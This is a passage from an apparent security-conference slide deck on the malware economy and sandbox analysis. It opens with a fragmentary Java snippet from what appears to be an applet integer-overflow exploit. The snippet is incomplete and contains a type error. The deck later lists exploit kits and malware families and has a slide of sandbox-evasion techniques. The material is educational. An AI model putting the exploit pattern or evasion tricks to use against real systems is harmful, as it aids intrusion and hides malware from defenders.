        MultiPixelPackedSampleModel obj8 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 2, 1, 0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
        Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
        byte obj10 = new byte[] {0, -1}
        IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
        CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
        obj12.compose(obj7, obj9, obj9);
        http://valhalla.allalla.com/2013/08/java-netbeans-applet-integer-overflow-win32-target-added/
  • 34. The Cheaper Path to Exploiting > Blackhole Exploit Kit http://en.wikipedia.org/wiki/Blackhole_exploit_kit > Styx Exploit Pack http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto > Neutrino http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html > RedKit http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
  • 35. The InfoStealer Choice
  • 36. The RAT Choice
  • 37. Bitcoin + APT = Ransomware
  • 38. The Command&Control Choice <#1>
  • 39. The Command&Control Choice <#2>
  • 40. The Command&Control Choice <#3>
  • 41. The Command&Control Choice <#4>
  • 42. <2012> The Antivirus Maker Confession. "The truth is, consumer-grade antivirus products can't protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose" Mikko Hypponen (F-Secure)
  • 43. The Way to Sandboxing
  • 44. The Way to Sandboxing <01> USER-MODE AGENT: software component in a guest operating system (keylogger) <02> KERNEL-MODE PATCHING: guest operating system kernel modified for tracing (rootkit) <03> VIRTUAL MACHINE MONITORING: customized hypervisor to monitor the guest operating system <04> SYSTEM EMULATION: hardware emulator to hook appropriate memory, IO functions, peripherals, etc. <05> KERNEL EMULATION: kernel emulator to hook appropriate system calls, etc.
  • 45. A (very) partial list of the players > Norman Sandbox (Norway 2001) > FireEye (US 2004) > Damballa (US 2006) > Lastline/Anubis/Wepawet (Austria 2006) > Sandboxie (2006) > Cuckoo Sandbox (2010) > VMRay formerly CWSandbox (Germany 2007) > Joe Security LLC (Switzerland 2007) > BitBlaze (2008) > ThreatExpert (Ireland 2008) > Ether (US 2009)
  • 47. A (completely) partial list of the evaders
  • 48. Evading Sandbox 4 Dummies > Human Interaction (UpClicker, December 2012) > MessageBox (something that needs to be clicked) > Sleep Calls (Trojan Nap, uncovered in February 2013) > Time Triggers (Hastati, March 2013, a massive data-destroying attack in South Korea) > Check Internet Connection > Check Volume information and Size > Check self Executable name > Execution after reboot > Check System services, files and communication ports
  • 49. The limit of sandboxes: minutes. def: Patient Zero is the first patient identified in the population sample of an epidemiological investigation

  • 50. Certainly better than trusting the users
  • 51. Questions? (the closing slide repeats it in Italian "Domande?", Arabic, Spanish "¿Preguntas?", English, Klingon "tupoQghachmey", Sindarin, Japanese, Greek "Ερωτήσεις?" and Russian "вопросы?")